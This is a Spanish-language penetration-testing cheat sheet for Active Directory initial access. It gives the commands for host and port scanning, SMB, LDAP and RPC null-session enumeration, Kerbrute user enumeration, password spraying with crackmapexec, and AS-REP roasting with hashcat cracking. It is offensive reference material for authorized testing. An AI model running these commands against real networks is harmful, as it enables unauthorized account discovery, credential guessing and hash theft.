🔷Enumeración Básica
Enumeración de AD para obtener un acceso inicial
Mapping Network
Host Discovery
fping -agp <ip-range>
nmap -sn <ip-range>
Port Scanning
nmap -sS -p- -T3 -iL hosts.txt -oN full-nmap.txt
nmap -p <ports> -sCV -iL hosts.txt
Network Enumeration - SMB
Listing SMB Shares
smbclient -L //<ip> -N
smbmap -H <ip>
nmap -p 445 --script smb-enum-shares <ip>
Accessing SMB Shares
smbclient //<ip>/<share-name> -N
smbclient //<ip>/<share-name> --user=<username> --password=<pass> -W <domain>
Domain Enumeration
LDAP Enumeration via Anonymous Bind
ldapsearch -x -H ldap://<ip> -s base
ldapsearch -x -H ldap://<ip> -b "<dc=name,dc=name...>" "(objectClass=person)"
Enum4linux-ng
enum4linux-ng -A <ip> -oA output.txt
RPC Enumeration via Null Session
rpcclient -U "" <ip> -N # verificar acceso RPC con null session
> enumdomusers # enumerar usuarios y RID
> help # lista comandos disponibles
for i in $(seq 500 2000); do echo "queryuser $i" |rpcclient -U "" -N <ip> 2>/dev/null | grep -i "User Name"; done
Username Enumeration with Kerbrute
./kerbrute userenum --dc <ip> -d <domain-name> users.txt
# users.txt = lista de potenciales usuarios recogidos con rpcclient/enum4linux-ng
Password Spraying
Password Policy Check
rpcclient
rpcclient -U "" <ip> -N
> getdompwinfo
crackmapexec
crackmapexec smb <ip> --pass-pol
Password Spraying Attack with CrackMapExec
crackmapexec smb <ip> -u users.txt -p passwords.txt
AS-REP Roasting
Enumeración - UF_DONT_REQUIRE_PREAUTH
UF_DONT_REQUIRE_PREAUTH
impacket-GetNPUsers <domain-name>/ -dc-ip <ip> -usersfile users.txt -format hashcat -outputfile hashes.txt -no-pass
Explotación
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt
Última actualización